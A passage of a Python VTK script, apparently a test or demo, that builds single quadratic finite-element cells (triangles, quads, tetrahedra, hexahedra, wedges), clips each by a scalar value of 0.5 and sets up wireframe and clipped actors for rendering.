triPoints.InsertPoint(1, 1.0, 0.0, 0.0)
triPoints.InsertPoint(2, 0.5, 0.8, 0.0)
triPoints.InsertPoint(3, 0.5, 0.0, 0.0)
triPoints.InsertPoint(4, 0.75, 0.4, 0.0)
triPoints.InsertPoint(5, 0.25, 0.4, 0.0)
triScalars = vtk.vtkFloatArray()
triScalars.SetNumberOfTuples(6)
triScalars.InsertValue(0, 0.0)
triScalars.InsertValue(1, 0.0)
triScalars.InsertValue(2, 0.0)
triScalars.InsertValue(3, 1.0)
triScalars.InsertValue(4, 0.0)
triScalars.InsertValue(5, 0.0)
aTri = vtk.vtkQuadraticTriangle()
aTri.GetPointIds().SetId(0, 0)
aTri.GetPointIds().SetId(1, 1)
aTri.GetPointIds().SetId(2, 2)
aTri.GetPointIds().SetId(3, 3)
aTri.GetPointIds().SetId(4, 4)
aTri.GetPointIds().SetId(5, 5)
aTriGrid = vtk.vtkUnstructuredGrid()
aTriGrid.Allocate(1, 1)
aTriGrid.InsertNextCell(aTri.GetCellType(), aTri.GetPointIds())
aTriGrid.SetPoints(triPoints)
aTriGrid.GetPointData().SetScalars(triScalars)
triclips = vtk.vtkClipDataSet()
triclips.SetInputData(aTriGrid)
triclips.SetValue(0.5)
aTriclipMapper = vtk.vtkDataSetMapper()
aTriclipMapper.SetInputConnection(triclips.GetOutputPort())
aTriclipMapper.ScalarVisibilityOff()
aTriMapper = vtk.vtkDataSetMapper()
aTriMapper.SetInputData(aTriGrid)
aTriMapper.ScalarVisibilityOff()
aTriActor = vtk.vtkActor()
aTriActor.SetMapper(aTriMapper)
aTriActor.GetProperty().SetRepresentationToWireframe()
aTriActor.GetProperty().SetAmbient(1.0)
aTriclipActor = vtk.vtkActor()
aTriclipActor.SetMapper(aTriclipMapper)
aTriclipActor.GetProperty().BackfaceCullingOn()
aTriclipActor.GetProperty().SetAmbient(1.0)
# Quadratic quadrilateral
quadPoints = vtk.vtkPoints()
quadPoints.SetNumberOfPoints(8)
quadPoints.InsertPoint(0, 0.0, 0.0, 0.0)
quadPoints.InsertPoint(1, 1.0, 0.0, 0.0)
quadPoints.InsertPoint(2, 1.0, 1.0, 0.0)
quadPoints.InsertPoint(3, 0.0, 1.0, 0.0)
quadPoints.InsertPoint(4, 0.5, 0.0, 0.0)
quadPoints.InsertPoint(5, 1.0, 0.5, 0.0)
quadPoints.InsertPoint(6, 0.5, 1.0, 0.0)
quadPoints.InsertPoint(7, 0.0, 0.5, 0.0)
quadScalars = vtk.vtkFloatArray()
quadScalars.SetNumberOfTuples(8)
quadScalars.InsertValue(0, 0.0)
quadScalars.InsertValue(1, 0.0)
quadScalars.InsertValue(2, 1.0)
quadScalars.InsertValue(3, 1.0)
quadScalars.InsertValue(4, 1.0)
quadScalars.InsertValue(5, 0.0)
quadScalars.InsertValue(6, 0.0)
quadScalars.InsertValue(7, 0.0)
aQuad = vtk.vtkQuadraticQuad()
aQuad.GetPointIds().SetId(0, 0)
aQuad.GetPointIds().SetId(1, 1)
aQuad.GetPointIds().SetId(2, 2)
aQuad.GetPointIds().SetId(3, 3)
aQuad.GetPointIds().SetId(4, 4)
aQuad.GetPointIds().SetId(5, 5)
aQuad.GetPointIds().SetId(6, 6)
aQuad.GetPointIds().SetId(7, 7)
aQuadGrid = vtk.vtkUnstructuredGrid()
aQuadGrid.Allocate(1, 1)
aQuadGrid.InsertNextCell(aQuad.GetCellType(), aQuad.GetPointIds())
aQuadGrid.SetPoints(quadPoints)
aQuadGrid.GetPointData().SetScalars(quadScalars)
quadclips = vtk.vtkClipDataSet()
quadclips.SetInputData(aQuadGrid)
quadclips.SetValue(0.5)
aQuadclipMapper = vtk.vtkDataSetMapper()
aQuadclipMapper.SetInputConnection(quadclips.GetOutputPort())
aQuadclipMapper.ScalarVisibilityOff()
aQuadMapper = vtk.vtkDataSetMapper()
aQuadMapper.SetInputData(aQuadGrid)
aQuadMapper.ScalarVisibilityOff()
aQuadActor = vtk.vtkActor()
aQuadActor.SetMapper(aQuadMapper)
aQuadActor.GetProperty().SetRepresentationToWireframe()
aQuadActor.GetProperty().SetAmbient(1.0)
aQuadclipActor = vtk.vtkActor()
aQuadclipActor.SetMapper(aQuadclipMapper)
aQuadclipActor.GetProperty().BackfaceCullingOn()
aQuadclipActor.GetProperty().SetAmbient(1.0)
# BiQuadratic quadrilateral
BquadPoints = vtk.vtkPoints()
BquadPoints.SetNumberOfPoints(9)
BquadPoints.InsertPoint(0, 0.0, 0.0, 0.0)
BquadPoints.InsertPoint(1, 1.0, 0.0, 0.0)
BquadPoints.InsertPoint(2, 1.0, 1.0, 0.0)
BquadPoints.InsertPoint(3, 0.0, 1.0, 0.0)
BquadPoints.InsertPoint(4, 0.5, 0.0, 0.0)
BquadPoints.InsertPoint(5, 1.0, 0.5, 0.0)
BquadPoints.InsertPoint(6, 0.5, 1.0, 0.0)
BquadPoints.InsertPoint(7, 0.0, 0.5, 0.0)
BquadPoints.InsertPoint(8, 0.5, 0.5, 0.0)
BquadScalars = vtk.vtkFloatArray()
BquadScalars.SetNumberOfTuples(9)
BquadScalars.InsertValue(0, 1.0)
BquadScalars.InsertValue(1, 1.0)
BquadScalars.InsertValue(2, 1.0)
BquadScalars.InsertValue(3, 1.0)
BquadScalars.InsertValue(4, 0.0)
BquadScalars.InsertValue(5, 0.0)
BquadScalars.InsertValue(6, 0.0)
BquadScalars.InsertValue(7, 0.0)
BquadScalars.InsertValue(8, 1.0)
BQuad = vtk.vtkBiQuadraticQuad()
BQuad.GetPointIds().SetId(0, 0)
BQuad.GetPointIds().SetId(1, 1)
BQuad.GetPointIds().SetId(2, 2)
BQuad.GetPointIds().SetId(3, 3)
BQuad.GetPointIds().SetId(4, 4)
BQuad.GetPointIds().SetId(5, 5)
BQuad.GetPointIds().SetId(6, 6)
BQuad.GetPointIds().SetId(7, 7)
BQuad.GetPointIds().SetId(8, 8)
BQuadGrid = vtk.vtkUnstructuredGrid()
BQuadGrid.Allocate(1, 1)
BQuadGrid.InsertNextCell(BQuad.GetCellType(), BQuad.GetPointIds())
BQuadGrid.SetPoints(BquadPoints)
BQuadGrid.GetPointData().SetScalars(BquadScalars)
Bquadclips = vtk.vtkClipDataSet()
Bquadclips.SetInputData(BQuadGrid)
Bquadclips.SetValue(0.5)
BQuadclipMapper = vtk.vtkDataSetMapper()
BQuadclipMapper.SetInputConnection(Bquadclips.GetOutputPort())
BQuadclipMapper.ScalarVisibilityOff()
BQuadMapper = vtk.vtkDataSetMapper()
BQuadMapper.SetInputData(BQuadGrid)
BQuadMapper.ScalarVisibilityOff()
BQuadActor = vtk.vtkActor()
BQuadActor.SetMapper(BQuadMapper)
BQuadActor.GetProperty().SetRepresentationToWireframe()
BQuadActor.GetProperty().SetAmbient(1.0)
BQuadclipActor = vtk.vtkActor()
BQuadclipActor.SetMapper(BQuadclipMapper)
BQuadclipActor.GetProperty().BackfaceCullingOn()
BQuadclipActor.GetProperty().SetAmbient(1.0)
# Quadratic linear quadrilateral
QLquadPoints = vtk.vtkPoints()
QLquadPoints.SetNumberOfPoints(6)
QLquadPoints.InsertPoint(0, 0.0, 0.0, 0.0)
QLquadPoints.InsertPoint(1, 1.0, 0.0, 0.0)
QLquadPoints.InsertPoint(2, 1.0, 1.0, 0.0)
QLquadPoints.InsertPoint(3, 0.0, 1.0, 0.0)
QLquadPoints.InsertPoint(4, 0.5, 0.0, 0.0)
QLquadPoints.InsertPoint(5, 0.5, 1.0, 0.0)
QLquadScalars = vtk.vtkFloatArray()
QLquadScalars.SetNumberOfTuples(6)
QLquadScalars.InsertValue(0, 1.0)
QLquadScalars.InsertValue(1, 1.0)
QLquadScalars.InsertValue(2, 0.0)
QLquadScalars.InsertValue(3, 0.0)
QLquadScalars.InsertValue(4, 0.0)
QLquadScalars.InsertValue(5, 1.0)
QLQuad = vtk.vtkQuadraticLinearQuad()
QLQuad.GetPointIds().SetId(0, 0)
QLQuad.GetPointIds().SetId(1, 1)
QLQuad.GetPointIds().SetId(2, 2)
QLQuad.GetPointIds().SetId(3, 3)
QLQuad.GetPointIds().SetId(4, 4)
QLQuad.GetPointIds().SetId(5, 5)
QLQuadGrid = vtk.vtkUnstructuredGrid()
QLQuadGrid.Allocate(1, 1)
QLQuadGrid.InsertNextCell(QLQuad.GetCellType(), QLQuad.GetPointIds())
QLQuadGrid.SetPoints(QLquadPoints)
QLQuadGrid.GetPointData().SetScalars(QLquadScalars)
QLquadclips = vtk.vtkClipDataSet()
QLquadclips.SetInputData(QLQuadGrid)
QLquadclips.SetValue(0.5)
QLQuadclipMapper = vtk.vtkDataSetMapper()
QLQuadclipMapper.SetInputConnection(QLquadclips.GetOutputPort())
QLQuadclipMapper.ScalarVisibilityOff()
QLQuadMapper = vtk.vtkDataSetMapper()
QLQuadMapper.SetInputData(QLQuadGrid)
QLQuadMapper.ScalarVisibilityOff()
QLQuadActor = vtk.vtkActor()
QLQuadActor.SetMapper(QLQuadMapper)
QLQuadActor.GetProperty().SetRepresentationToWireframe()
QLQuadActor.GetProperty().SetAmbient(1.0)
QLQuadclipActor = vtk.vtkActor()
QLQuadclipActor.SetMapper(QLQuadclipMapper)
QLQuadclipActor.GetProperty().BackfaceCullingOn()
QLQuadclipActor.GetProperty().SetAmbient(1.0)
# Quadratic tetrahedron
tetPoints = vtk.vtkPoints()
tetPoints.SetNumberOfPoints(10)
tetPoints.InsertPoint(0, 0.0, 0.0, 0.0)
tetPoints.InsertPoint(1, 1.0, 0.0, 0.0)
tetPoints.InsertPoint(2, 0.5, 0.8, 0.0)
tetPoints.InsertPoint(3, 0.5, 0.4, 1.0)
tetPoints.InsertPoint(4, 0.5, 0.0, 0.0)
tetPoints.InsertPoint(5, 0.75, 0.4, 0.0)
tetPoints.InsertPoint(6, 0.25, 0.4, 0.0)
tetPoints.InsertPoint(7, 0.25, 0.2, 0.5)
tetPoints.InsertPoint(8, 0.75, 0.2, 0.5)
tetPoints.InsertPoint(9, 0.50, 0.6, 0.5)
tetScalars = vtk.vtkFloatArray()
tetScalars.SetNumberOfTuples(10)
tetScalars.InsertValue(0, 1.0)
tetScalars.InsertValue(1, 1.0)
tetScalars.InsertValue(2, 1.0)
tetScalars.InsertValue(3, 1.0)
tetScalars.InsertValue(4, 0.0)
tetScalars.InsertValue(5, 0.0)
tetScalars.InsertValue(6, 0.0)
tetScalars.InsertValue(7, 0.0)
tetScalars.InsertValue(8, 0.0)
tetScalars.InsertValue(9, 0.0)
aTet = vtk.vtkQuadraticTetra()
aTet.GetPointIds().SetId(0, 0)
aTet.GetPointIds().SetId(1, 1)
aTet.GetPointIds().SetId(2, 2)
aTet.GetPointIds().SetId(3, 3)
aTet.GetPointIds().SetId(4, 4)
aTet.GetPointIds().SetId(5, 5)
aTet.GetPointIds().SetId(6, 6)
aTet.GetPointIds().SetId(7, 7)
aTet.GetPointIds().SetId(8, 8)
aTet.GetPointIds().SetId(9, 9)
aTetGrid = vtk.vtkUnstructuredGrid()
aTetGrid.Allocate(1, 1)
aTetGrid.InsertNextCell(aTet.GetCellType(), aTet.GetPointIds())
aTetGrid.SetPoints(tetPoints)
aTetGrid.GetPointData().SetScalars(tetScalars)
tetclips = vtk.vtkClipDataSet()
tetclips.SetInputData(aTetGrid)
tetclips.SetValue(0.5)
aTetclipMapper = vtk.vtkDataSetMapper()
aTetclipMapper.SetInputConnection(tetclips.GetOutputPort())
aTetclipMapper.ScalarVisibilityOff()
aTetMapper = vtk.vtkDataSetMapper()
aTetMapper.SetInputData(aTetGrid)
aTetMapper.ScalarVisibilityOff()
aTetActor = vtk.vtkActor()
aTetActor.SetMapper(aTetMapper)
aTetActor.GetProperty().SetRepresentationToWireframe()
aTetActor.GetProperty().SetAmbient(1.0)
aTetclipActor = vtk.vtkActor()
aTetclipActor.SetMapper(aTetclipMapper)
aTetclipActor.GetProperty().SetAmbient(1.0)
# Quadratic hexahedron
hexPoints = vtk.vtkPoints()
hexPoints.SetNumberOfPoints(20)
hexPoints.InsertPoint(0, 0, 0, 0)
hexPoints.InsertPoint(1, 1, 0, 0)
hexPoints.InsertPoint(2, 1, 1, 0)
hexPoints.InsertPoint(3, 0, 1, 0)
hexPoints.InsertPoint(4, 0, 0, 1)
hexPoints.InsertPoint(5, 1, 0, 1)
hexPoints.InsertPoint(6, 1, 1, 1)
hexPoints.InsertPoint(7, 0, 1, 1)
hexPoints.InsertPoint(8, 0.5, 0, 0)
hexPoints.InsertPoint(9, 1, 0.5, 0)
hexPoints.InsertPoint(10, 0.5, 1, 0)
hexPoints.InsertPoint(11, 0, 0.5, 0)
hexPoints.InsertPoint(12, 0.5, 0, 1)
hexPoints.InsertPoint(13, 1, 0.5, 1)
hexPoints.InsertPoint(14, 0.5, 1, 1)
hexPoints.InsertPoint(15, 0, 0.5, 1)
hexPoints.InsertPoint(16, 0, 0, 0.5)
hexPoints.InsertPoint(17, 1, 0, 0.5)
hexPoints.InsertPoint(18, 1, 1, 0.5)
hexPoints.InsertPoint(19, 0, 1, 0.5)
hexScalars = vtk.vtkFloatArray()
hexScalars.SetNumberOfTuples(20)
hexScalars.InsertValue(0, 1.0)
hexScalars.InsertValue(1, 1.0)
hexScalars.InsertValue(2, 1.0)
hexScalars.InsertValue(3, 1.0)
hexScalars.InsertValue(4, 1.0)
hexScalars.InsertValue(5, 1.0)
hexScalars.InsertValue(6, 1.0)
hexScalars.InsertValue(7, 1.0)
hexScalars.InsertValue(8, 0.0)
hexScalars.InsertValue(9, 0.0)
hexScalars.InsertValue(10, 0.0)
hexScalars.InsertValue(11, 0.0)
hexScalars.InsertValue(12, 0.0)
hexScalars.InsertValue(13, 0.0)
hexScalars.InsertValue(14, 0.0)
hexScalars.InsertValue(15, 0.0)
hexScalars.InsertValue(16, 0.0)
hexScalars.InsertValue(17, 0.0)
hexScalars.InsertValue(18, 0.0)
hexScalars.InsertValue(19, 0.0)
aHex = vtk.vtkQuadraticHexahedron()
aHex.GetPointIds().SetId(0, 0)
aHex.GetPointIds().SetId(1, 1)
aHex.GetPointIds().SetId(2, 2)
aHex.GetPointIds().SetId(3, 3)
aHex.GetPointIds().SetId(4, 4)
aHex.GetPointIds().SetId(5, 5)
aHex.GetPointIds().SetId(6, 6)
aHex.GetPointIds().SetId(7, 7)
aHex.GetPointIds().SetId(8, 8)
aHex.GetPointIds().SetId(9, 9)
aHex.GetPointIds().SetId(10, 10)
aHex.GetPointIds().SetId(11, 11)
aHex.GetPointIds().SetId(12, 12)
aHex.GetPointIds().SetId(13, 13)
aHex.GetPointIds().SetId(14, 14)
aHex.GetPointIds().SetId(15, 15)
aHex.GetPointIds().SetId(16, 16)
aHex.GetPointIds().SetId(17, 17)
aHex.GetPointIds().SetId(18, 18)
aHex.GetPointIds().SetId(19, 19)
aHexGrid = vtk.vtkUnstructuredGrid()
aHexGrid.Allocate(1, 1)
aHexGrid.InsertNextCell(aHex.GetCellType(), aHex.GetPointIds())
aHexGrid.SetPoints(hexPoints)
aHexGrid.GetPointData().SetScalars(hexScalars)
hexclips = vtk.vtkClipDataSet()
hexclips.SetInputData(aHexGrid)
hexclips.SetValue(0.5)
aHexclipMapper = vtk.vtkDataSetMapper()
aHexclipMapper.SetInputConnection(hexclips.GetOutputPort())
aHexclipMapper.ScalarVisibilityOff()
aHexMapper = vtk.vtkDataSetMapper()
aHexMapper.SetInputData(aHexGrid)
aHexMapper.ScalarVisibilityOff()
aHexActor = vtk.vtkActor()
aHexActor.SetMapper(aHexMapper)
aHexActor.GetProperty().SetRepresentationToWireframe()
aHexActor.GetProperty().SetAmbient(1.0)
aHexclipActor = vtk.vtkActor()
aHexclipActor.SetMapper(aHexclipMapper)
aHexclipActor.GetProperty().SetAmbient(1.0)
# TriQuadratic hexahedron
TQhexPoints = vtk.vtkPoints()
TQhexPoints.SetNumberOfPoints(27)
TQhexPoints.InsertPoint(0, 0, 0, 0)
TQhexPoints.InsertPoint(1, 1, 0, 0)
TQhexPoints.InsertPoint(2, 1, 1, 0)
TQhexPoints.InsertPoint(3, 0, 1, 0)
TQhexPoints.InsertPoint(4, 0, 0, 1)
TQhexPoints.InsertPoint(5, 1, 0, 1)
TQhexPoints.InsertPoint(6, 1, 1, 1)
TQhexPoints.InsertPoint(7, 0, 1, 1)
TQhexPoints.InsertPoint(8, 0.5, 0, 0)
TQhexPoints.InsertPoint(9, 1, 0.5, 0)
TQhexPoints.InsertPoint(10, 0.5, 1, 0)
TQhexPoints.InsertPoint(11, 0, 0.5, 0)
TQhexPoints.InsertPoint(12, 0.5, 0, 1)
TQhexPoints.InsertPoint(13, 1, 0.5, 1)
TQhexPoints.InsertPoint(14, 0.5, 1, 1)
TQhexPoints.InsertPoint(15, 0, 0.5, 1)
TQhexPoints.InsertPoint(16, 0, 0, 0.5)
TQhexPoints.InsertPoint(17, 1, 0, 0.5)
TQhexPoints.InsertPoint(18, 1, 1, 0.5)
TQhexPoints.InsertPoint(19, 0, 1, 0.5)
TQhexPoints.InsertPoint(22, 0.5, 0, 0.5)
TQhexPoints.InsertPoint(21, 1, 0.5, 0.5)
TQhexPoints.InsertPoint(23, 0.5, 1, 0.5)
TQhexPoints.InsertPoint(20, 0, 0.5, 0.5)
TQhexPoints.InsertPoint(24, 0.5, 0.5, 0.0)
TQhexPoints.InsertPoint(25, 0.5, 0.5, 1)
TQhexPoints.InsertPoint(26, 0.5, 0.5, 0.5)
TQhexScalars = vtk.vtkFloatArray()
TQhexScalars.SetNumberOfTuples(27)
TQhexScalars.InsertValue(0, 1.0)
TQhexScalars.InsertValue(1, 1.0)
TQhexScalars.InsertValue(2, 1.0)
TQhexScalars.InsertValue(3, 1.0)
TQhexScalars.InsertValue(4, 1.0)
TQhexScalars.InsertValue(5, 1.0)
TQhexScalars.InsertValue(6, 1.0)
TQhexScalars.InsertValue(7, 1.0)
TQhexScalars.InsertValue(8, 0.0)
TQhexScalars.InsertValue(9, 0.0)
TQhexScalars.InsertValue(10, 0.0)
TQhexScalars.InsertValue(11, 0.0)
TQhexScalars.InsertValue(12, 0.0)
TQhexScalars.InsertValue(13, 0.0)
TQhexScalars.InsertValue(14, 0.0)
TQhexScalars.InsertValue(15, 0.0)
TQhexScalars.InsertValue(16, 0.0)
TQhexScalars.InsertValue(17, 0.0)
TQhexScalars.InsertValue(18, 0.0)
TQhexScalars.InsertValue(19, 0.0)
TQhexScalars.InsertValue(20, 0.0)
TQhexScalars.InsertValue(21, 0.0)
TQhexScalars.InsertValue(22, 0.0)
TQhexScalars.InsertValue(23, 0.0)
TQhexScalars.InsertValue(24, 0.0)
TQhexScalars.InsertValue(25, 0.0)
TQhexScalars.InsertValue(26, 0.0)
TQHex = vtk.vtkTriQuadraticHexahedron()
TQHex.GetPointIds().SetId(0, 0)
TQHex.GetPointIds().SetId(1, 1)
TQHex.GetPointIds().SetId(2, 2)
TQHex.GetPointIds().SetId(3, 3)
TQHex.GetPointIds().SetId(4, 4)
TQHex.GetPointIds().SetId(5, 5)
TQHex.GetPointIds().SetId(6, 6)
TQHex.GetPointIds().SetId(7, 7)
TQHex.GetPointIds().SetId(8, 8)
TQHex.GetPointIds().SetId(9, 9)
TQHex.GetPointIds().SetId(10, 10)
TQHex.GetPointIds().SetId(11, 11)
TQHex.GetPointIds().SetId(12, 12)
TQHex.GetPointIds().SetId(13, 13)
TQHex.GetPointIds().SetId(14, 14)
TQHex.GetPointIds().SetId(15, 15)
TQHex.GetPointIds().SetId(16, 16)
TQHex.GetPointIds().SetId(17, 17)
TQHex.GetPointIds().SetId(18, 18)
TQHex.GetPointIds().SetId(19, 19)
TQHex.GetPointIds().SetId(20, 20)
TQHex.GetPointIds().SetId(21, 21)
TQHex.GetPointIds().SetId(22, 22)
TQHex.GetPointIds().SetId(23, 23)
TQHex.GetPointIds().SetId(24, 24)
TQHex.GetPointIds().SetId(25, 25)
TQHex.GetPointIds().SetId(26, 26)
TQHexGrid = vtk.vtkUnstructuredGrid()
TQHexGrid.Allocate(1, 1)
TQHexGrid.InsertNextCell(TQHex.GetCellType(), TQHex.GetPointIds())
TQHexGrid.SetPoints(TQhexPoints)
TQHexGrid.GetPointData().SetScalars(TQhexScalars)
TQhexclips = vtk.vtkClipDataSet()
TQhexclips.SetInputData(TQHexGrid)
TQhexclips.SetValue(0.5)
TQHexclipMapper = vtk.vtkDataSetMapper()
TQHexclipMapper.SetInputConnection(TQhexclips.GetOutputPort())
TQHexclipMapper.ScalarVisibilityOff()
TQHexMapper = vtk.vtkDataSetMapper()
TQHexMapper.SetInputData(TQHexGrid)
TQHexMapper.ScalarVisibilityOff()
TQHexActor = vtk.vtkActor()
TQHexActor.SetMapper(TQHexMapper)
TQHexActor.GetProperty().SetRepresentationToWireframe()
TQHexActor.GetProperty().SetAmbient(1.0)
TQHexclipActor = vtk.vtkActor()
TQHexclipActor.SetMapper(TQHexclipMapper)
TQHexclipActor.GetProperty().SetAmbient(1.0)
# BiQuadratic Quadratic hexahedron
BQhexPoints = vtk.vtkPoints()
BQhexPoints.SetNumberOfPoints(24)
BQhexPoints.InsertPoint(0, 0, 0, 0)
BQhexPoints.InsertPoint(1, 1, 0, 0)
BQhexPoints.InsertPoint(2, 1, 1, 0)
BQhexPoints.InsertPoint(3, 0, 1, 0)
BQhexPoints.InsertPoint(4, 0, 0, 1)
BQhexPoints.InsertPoint(5, 1, 0, 1)
BQhexPoints.InsertPoint(6, 1, 1, 1)
BQhexPoints.InsertPoint(7, 0, 1, 1)
BQhexPoints.InsertPoint(8, 0.5, 0, 0)
BQhexPoints.InsertPoint(9, 1, 0.5, 0)
BQhexPoints.InsertPoint(10, 0.5, 1, 0)
BQhexPoints.InsertPoint(11, 0, 0.5, 0)
BQhexPoints.InsertPoint(12, 0.5, 0, 1)
BQhexPoints.InsertPoint(13, 1, 0.5, 1)
BQhexPoints.InsertPoint(14, 0.5, 1, 1)
BQhexPoints.InsertPoint(15, 0, 0.5, 1)
BQhexPoints.InsertPoint(16, 0, 0, 0.5)
BQhexPoints.InsertPoint(17, 1, 0, 0.5)
BQhexPoints.InsertPoint(18, 1, 1, 0.5)
BQhexPoints.InsertPoint(19, 0, 1, 0.5)
BQhexPoints.InsertPoint(22, 0.5, 0, 0.5)
BQhexPoints.InsertPoint(21, 1, 0.5, 0.5)
BQhexPoints.InsertPoint(23, 0.5, 1, 0.5)
BQhexPoints.InsertPoint(20, 0, 0.5, 0.5)
BQhexScalars = vtk.vtkFloatArray()
BQhexScalars.SetNumberOfTuples(24)
BQhexScalars.InsertValue(0, 1.0)
BQhexScalars.InsertValue(1, 1.0)
BQhexScalars.InsertValue(2, 1.0)
BQhexScalars.InsertValue(3, 1.0)
BQhexScalars.InsertValue(4, 1.0)
BQhexScalars.InsertValue(5, 1.0)
BQhexScalars.InsertValue(6, 1.0)
BQhexScalars.InsertValue(7, 1.0)
BQhexScalars.InsertValue(8, 0.0)
BQhexScalars.InsertValue(9, 0.0)
BQhexScalars.InsertValue(10, 0.0)
BQhexScalars.InsertValue(11, 0.0)
BQhexScalars.InsertValue(12, 0.0)
BQhexScalars.InsertValue(13, 0.0)
BQhexScalars.InsertValue(14, 0.0)
BQhexScalars.InsertValue(15, 0.0)
BQhexScalars.InsertValue(16, 0.0)
BQhexScalars.InsertValue(17, 0.0)
BQhexScalars.InsertValue(18, 0.0)
BQhexScalars.InsertValue(19, 0.0)
BQhexScalars.InsertValue(20, 0.0)
BQhexScalars.InsertValue(21, 0.0)
BQhexScalars.InsertValue(22, 0.0)
BQhexScalars.InsertValue(23, 0.0)
BQHex = vtk.vtkBiQuadraticQuadraticHexahedron()
BQHex.GetPointIds().SetId(0, 0)
BQHex.GetPointIds().SetId(1, 1)
BQHex.GetPointIds().SetId(2, 2)
BQHex.GetPointIds().SetId(3, 3)
BQHex.GetPointIds().SetId(4, 4)
BQHex.GetPointIds().SetId(5, 5)
BQHex.GetPointIds().SetId(6, 6)
BQHex.GetPointIds().SetId(7, 7)
BQHex.GetPointIds().SetId(8, 8)
BQHex.GetPointIds().SetId(9, 9)
BQHex.GetPointIds().SetId(10, 10)
BQHex.GetPointIds().SetId(11, 11)
BQHex.GetPointIds().SetId(12, 12)
BQHex.GetPointIds().SetId(13, 13)
BQHex.GetPointIds().SetId(14, 14)
BQHex.GetPointIds().SetId(15, 15)
BQHex.GetPointIds().SetId(16, 16)
BQHex.GetPointIds().SetId(17, 17)
BQHex.GetPointIds().SetId(18, 18)
BQHex.GetPointIds().SetId(19, 19)
BQHex.GetPointIds().SetId(20, 20)
BQHex.GetPointIds().SetId(21, 21)
BQHex.GetPointIds().SetId(22, 22)
BQHex.GetPointIds().SetId(23, 23)
BQHexGrid = vtk.vtkUnstructuredGrid()
BQHexGrid.Allocate(1, 1)
BQHexGrid.InsertNextCell(BQHex.GetCellType(), BQHex.GetPointIds())
BQHexGrid.SetPoints(BQhexPoints)
BQHexGrid.GetPointData().SetScalars(BQhexScalars)
BQhexclips = vtk.vtkClipDataSet()
BQhexclips.SetInputData(BQHexGrid)
BQhexclips.SetValue(0.5)
BQHexclipMapper = vtk.vtkDataSetMapper()
BQHexclipMapper.SetInputConnection(BQhexclips.GetOutputPort())
BQHexclipMapper.ScalarVisibilityOff()
BQHexMapper = vtk.vtkDataSetMapper()
BQHexMapper.SetInputData(BQHexGrid)
BQHexMapper.ScalarVisibilityOff()
BQHexActor = vtk.vtkActor()
BQHexActor.SetMapper(BQHexMapper)
BQHexActor.GetProperty().SetRepresentationToWireframe()
BQHexActor.GetProperty().SetAmbient(1.0)
BQHexclipActor = vtk.vtkActor()
BQHexclipActor.SetMapper(BQHexclipMapper)
BQHexclipActor.GetProperty().SetAmbient(1.0)
# Quadratic wedge
wedgePoints = vtk.vtkPoints()
wedgePoints.SetNumberOfPoints(15)
wedgePoints.InsertPoint(0, 0, 0, 0)
wedgePoints.InsertPoint(1, 1, 0, 0)
wedgePoints.InsertPoint(2, 0, 1, 0)
wedgePoints.InsertPoint(3, 0, 0, 1)
wedgePoints.InsertPoint(4, 1, 0, 1)
wedgePoints.InsertPoint(5, 0, 1, 1)
wedgePoints.InsertPoint(6, 0.5, 0, 0)
wedgePoints.InsertPoint(7, 0.5, 0.5, 0)
wedgePoints.InsertPoint(8, 0, 0.5, 0)
wedgePoints.InsertPoint(9, 0.5, 0, 1)
wedgePoints.InsertPoint(10, 0.5, 0.5, 1)
wedgePoints.InsertPoint(11, 0, 0.5, 1)
wedgePoints.InsertPoint(12, 0, 0, 0.5)
wedgePoints.InsertPoint(13, 1, 0, 0.5)
wedgePoints.InsertPoint(14, 0, 1, 0.5)
wedgeScalars = vtk.vtkFloatArray()
wedgeScalars.SetNumberOfTuples(15)
wedgeScalars.InsertValue(0, 1.0)
wedgeScalars.InsertValue(1, 1.0)
wedgeScalars.InsertValue(2, 1.0)
wedgeScalars.InsertValue(3, 1.0)
wedgeScalars.InsertValue(4, 1.0)
wedgeScalars.InsertValue(5, 1.0)
wedgeScalars.InsertValue(6, 0.0)
wedgeScalars.InsertValue(7, 0.0)
wedgeScalars.InsertValue(8, 0.0)
wedgeScalars.InsertValue(9, 0.0)
wedgeScalars.InsertValue(10, 0.0)
wedgeScalars.InsertValue(11, 0.0)
wedgeScalars.InsertValue(12, 0.0)
wedgeScalars.InsertValue(13, 0.0)
wedgeScalars.InsertValue(14, 0.0)
aWedge = vtk.vtkQuadraticWedge()
aWedge.GetPointIds().SetId(0, 0)
aWedge.GetPointIds().SetId(1, 1)
aWedge.GetPointIds().SetId(2, 2)
aWedge.GetPointIds().SetId(3, 3)
aWedge.GetPointIds().SetId(4, 4)
aWedge.GetPointIds().SetId(5, 5)
aWedge.GetPointIds().SetId(6, 6)
aWedge.GetPointIds().SetId(7, 7)
aWedge.GetPointIds().SetId(8, 8)
aWedge.GetPointIds().SetId(9, 9)
aWedge.GetPointIds().SetId(10, 10)
aWedge.GetPointIds().SetId(11, 11)
aWedge.GetPointIds().SetId(12, 12)
aWedge.GetPointIds().SetId(13, 13)
aWedge.GetPointIds().SetId(14, 14)
aWedgeGrid = vtk.vtkUnstructuredGrid()
aWedgeGrid.Allocate(1, 1)
aWedgeGrid.InsertNextCell(aWedge.GetCellType(), aWedge.GetPointIds())
aWedgeGrid.SetPoints(wedgePoints)
aWedgeGrid.GetPointData().SetScalars(wedgeScalars)
wedgeclips = vtk.vtkClipDataSet()
wedgeclips.SetInputData(aWedgeGrid)
wedgeclips.SetValue(0.5)
aWedgeclipMapper = vtk.vtkDataSetMapper()
aWedgeclipMapper.SetInputConnection(wedgeclips.GetOutputPort())
aWedgeclipMapper.ScalarVisibilityOff()
aWedgeMapper = vtk.vtkDataSetMapper()
aWedgeMapper.SetInputData(aWedgeGrid)
aWedgeMapper.ScalarVisibilityOff()
aWedgeActor = vtk.vtkActor()
aWedgeActor.SetMapper(aWedgeMapper)
aWedgeActor.GetProperty().SetRepresentationToWireframe()
aWedgeActor.GetProperty().SetAmbient(1.0)
aWedgeclipActor = vtk.vtkActor()
aWedgeclipActor.SetMapper(aWedgeclipMapper)
aWedgeclipActor.GetProperty().SetAmbient(1.0)
# Quadratic linear wedge
QLwedgePoints = vtk.vtkPoints()
QLwedgePoints.SetNumberOfPoints(12)
QLwedgePoints.InsertPoint(0, 0, 0, 0)
QLwedgePoints.InsertPoint(1, 1, 0, 0)
QLwedgePoints.InsertPoint(2, 0, 1, 0)
QLwedgePoints.InsertPoint(3, 0, 0, 1)
QLwedgePoints.InsertPoint(4, 1, 0, 1)
QLwedgePoints.InsertPoint(5, 0, 1, 1)
QLwedgePoints.InsertPoint(6, 0.5, 0, 0)
QLwedgePoints.InsertPoint(7, 0.5, 0.5, 0)
QLwedgePoints.InsertPoint(8, 0, 0.5, 0)
QLwedgePoints.InsertPoint(9, 0.5, 0, 1)
